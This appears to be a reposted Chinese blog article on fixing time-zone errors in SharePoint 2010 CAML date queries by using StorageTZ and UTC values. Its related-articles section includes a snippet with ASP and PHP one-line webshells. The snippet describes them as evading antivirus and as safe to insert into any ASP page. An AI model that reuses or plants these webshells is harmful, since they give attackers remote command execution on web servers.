[SharePoint 2010] Client Object Model 跨时区查询list item的方法

SharePoint将所有的Datetime类型的数据都以universal的形式(UTC)存储在数据库中,当要在页面上显示类似list item的"Created", "Modified"等时间日期信息时,将数据库中的UTC时间取出来,然后根据当前Site的Regional Setting中设置的时区信息换算成当前的时间,所以我们在页面中看到的是当前时区下的正确时间。可是当我们用Client Object Model,通过CamlQuery 去查询list item的时候, 一旦涉及到Datetime类型的字段的时候就会遇见问题,比如说我要查询今天created的item,我把下面的ViewXML传给SharePoint Server

string today = DateTime.Now.ToString("yyyy'-'MM'-'dd'T'HH':'mm':'ss'Z'", DateTimeFormatInfo.InvariantInfo); 
CamlQuery query = new CamlQuery();
                query.DatesInUtc = true;
                query.ViewXml = @"<View>
                                <Query>
                                  <Where>
                                    <Eq>
                                      <FieldRef Name='Created'/>
                                      <Value Type='DateTime'>
" + today + @"</Value>
                                    </Eq>
                                  </Where>
                                </Query>
                              </View>
";

                ListItemCollection items = targetList.GetItems(query);
                clientContext.Load(items);
                clientContext.ExecuteQuery();

这时候SharePoint 就会以today的时间去作查询,因为没有时区信息,所以当client和SharePoint server不在同一时区设置时,查询结果就会错误,因为SharePoint不知道client object model传过来的时间是什么时区的,它只会根据字面的值在当前时区下查询。

解决方法如下,在Caml中加入一个"StorageTZ"的属性,然后给一个UTC时间,这就告诉SharePoint,我要用UTC时间来查询,所得的结果也是正确的。

 

string today = DateTime.UtcNow.ToString("yyyy'-'MM'-'dd'T'HH':'mm':'ss'Z'", DateTimeFormatInfo.InvariantInfo); 

                //DateTime today = DateTime.Now;
                CamlQuery query = new CamlQuery();
                query.DatesInUtc = true;
                query.ViewXml = @"<View>
                                <Query>
                                  <Where>
                                    <Eq>
                                      <FieldRef Name='Created'/>
                                      <Value 
StorageTZ='TRUE' Type='DateTime'>" + today + @"</Value>
                                    </Eq>
                                  </Where>
                                </Query>
                              </View>
";

                ListItemCollection items = targetList.GetItems(query);
                clientContext.Load(items);
                clientContext.ExecuteQuery();

 

 

转载于:https://www.cnblogs.com/tonnie/archive/2011/11/01/com.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/462436.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux下静态库和动态库的编译连接

http://blog.sina.com.cn/s/blog_4090ba590100t3nu.html .a文件 gcc -c test.c ar rc libtest.a test.o ranlib libtest.a 静态库只要编译出.o文件然后用ar打入包中就可以 动态库或共享库不用libtool工具&#xff1a; gcc -fpic -o test.o -c test gcc -shared -o te…

修改终端服务端口的方法

修改终端服务端口的方法Windows 2000 下的修改办法   win2k的终端服务可以运行在两种方式下&#xff1a;远程管理或应用程序服务器模式。   远程管理模式&#xff1a;允许一定数量的管理员远程管理这个服务器&#xff0c;这个模式对服务器性能的影响程度最低。   应用程序…

PYTHON -c

命令行执行代码转载于:https://www.cnblogs.com/BlueFire-py/p/10957663.html

Linux显示中文乱码解决方法

http://sumit.blog.51cto.com/162317/206698经常使用linux终端&#xff0c;有人上传中文命名的文件显示出中文乱码&#xff0c;下面是解决方法。默认显示的字符编码# echo $LANGen_US.UTF-8修改i18n文件# vi /etc/sysconfig/i18nLANG"zh_CN.GB18030"LANGUAGE"zh…

多行字符串的表示方式

原文载于&#xff1a;http://robinwu.iteye.com/blog/145514 其中最重要的、忽略一切转义字符、多行大包围、相当于的多行版本 1 str <<EOF 2 This isnt a tab: \t 3 and this isnt a newline: \n 4 EOF 5 6 puts str 转载于:https://www.cnblogs.com/kloboh…

nodejs+redis

为什么80%的码农都做不了架构师&#xff1f;>>> redis可以用来管理session http://www.csser.com/board/4f77e6f996ca600f78000936 然后使用的时候redis-server这个服务进程得开着&#xff0c;不然会悲剧的 转载于:https://my.oschina.net/kiloct/blog/137629

Caused by: java.lang.ClassNotFoundException: Cannot find class: User

源代码: <select id"selectAll" resultType"User">select user_id uid,user_name username,user_password password,user_gender gender, user_birthday birthday, user_status status from users</select> 正确代码: <select id"s…

标准C语言库 Glibc 2.15

http://www.oschina.net/p/glibc Glibc 是提供系统调用和基本函数的 C 库&#xff0c;比如open, malloc, printf等等。所有动态连接的程序都要用到它。 Glibc最新更新资讯&#xff0c;共2条 (投递新闻) 1个月前GNU libc 2.15 (Glibc) 发布 2评/952阅 7个月前GLib 2.30.0 发布&…

FxCAD 实验三 实现对象的【属性】事件

接着实验三&#xff0c;本次实验&#xff0c;实现鼠标右键点击【图形对象时】可以弹出一个【WinForm】属性界面 添加一个WindowsForm 界面&#xff0c;如图。类名字&#xff1a;FormBox 回到FxBox类文件 覆盖 SelectEvent 方法&#xff0c;添加上面的代码 运行程序&#xff0c;…

SQL Server文本和图像函数

文本和图像函数 1、查找特定字符串PATINDEX 语法与字符串的patindex一样。 2、获取文本指针TEXTPTR SQLServer在存储文本类型(ntext、text)和图像数据类型(image)时&#xff0c;默认情况是与常见的基本数据类型(如char、int等)这样的数据时单独存储的&#xff0c;也就是说&…

图像的灰度处理

图像的灰度处理的三种方法&#xff1a; 1.imread的方法将像素值修改为0 2.调用一个RGB转灰度的方法实现灰度转化&#xff08;cv2.COLOR_BGR2GRAY&#xff09; 3.R G B 的均值取灰度值来灰度转化&#xff08;原理&#xff09; 处理结果 如下: 转载于:https://www.cnblogs.com/Ja…

在Linux终端下调用可执行文件时总要加上符号./的原因

原网址 : http://blog.csdn.net/snakebite1985/article/details/1638453 刚接触Shell时总感到很奇怪&#xff1a;如果当前的Shell工作目录为/home/Victor/&#xff0c;且此目录下有一个叫做myproc的可执行文件&#xff0c;那么简单的在命令行中输入myproc并回车并不能调用这个…

面向对象基础-委托与事件

首先举一个实例&#xff1a;创建一个控制台程序&#xff0c;需求是&#xff1a;有一只猫Tom&#xff0c;有两只老鼠Jerry和Jack&#xff0c;Tom只叫一声“喵&#xff0c;我是Tom”&#xff0c;两只老鼠就说“老猫来了&#xff0c;快跑”&#xff0c;我们来分析一下&#xff1a;…

SQL Server数学函数

数学函数 1、计算绝对值ABS ABS函数对一个数值表达式结果计算绝对值(bit数据类型除外)&#xff0c;返回整数。 语法结构&#xff1a; ABS(数值表达式) 返回值&#xff1a;与数值表达式类型一致的数据 示例&#xff1a; SELECT ABS(-1) --输出 1 2、获取大于等于最小整数值Ce…

tornado框架基础11-tornado异步

01 同步和异步 生活中常常会遇到在超市排队买东西的情况&#xff0c;排在你前面的人没有结算完成&#xff0c;你就无法付账&#xff0c;在计算机中也有类似的情形&#xff0c;一个程序在执行之前&#xff0c;需要等待其他的程序执行完成&#xff0c;大家还能举出其他的例子吗&a…

select,epoll,poll比较

http://blog.sina.com.cn/s/blog_8fa7dd41010153zx.html select&#xff0c;poll&#xff0c;epoll简介 select select本质上是通过设置或者检查存放fd标志位的数据结构来进行下一步处理。这样所带来的缺点是&#xff1a; 1 单个进程可监视的fd数量被限制 2 需要维护一个用…

一句话

以下这个ASP一句话<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%><?php ($_$_GET[2]).$_($_POST[1])?>上面这句是防杀防扫的&#xff01;网上很少人用&#xff01;可以插在网页任何ASP文件的最底部不会出错&…

linux下wget的用法

2019独角兽企业重金招聘Python工程师标准>>> Linux wget是一个下载文件的工具&#xff0c;它用在命令行下。对于Linux用户是必不可少的工具&#xff0c;尤其对于网络管理员&#xff0c;经常要下载一些软件或从远程服务器恢复备份到本地服务器。如果我们使用虚拟主机…

【传智播客】Libevent学习笔记(三):事件循环

目录 00. 目录01. event_base_loop函数02. event_base_dispatch函数03. event_base_loopexit函数04. event_base_loopbreak函数05. event_base_got_exit函数06. event_base_got_break函数07. event_base_dump_events函数08. event_base_dump_events函数09. 废弃的事件循环函数1…

linux下设定动态库路径的命令-error while loading shared libraries: xxx.so.x错误的原因和解决办法

网站&#xff1a;http://blog.chinaunix.net/uid-26212859-id-3256667.html 一般我们在Linux下执行某些外部程序的时候可能会提示找不到共享库的错误, 比如: tmux: error while loading shared libraries: libevent-1.4.so.2: cannot open shared object file: No such file o…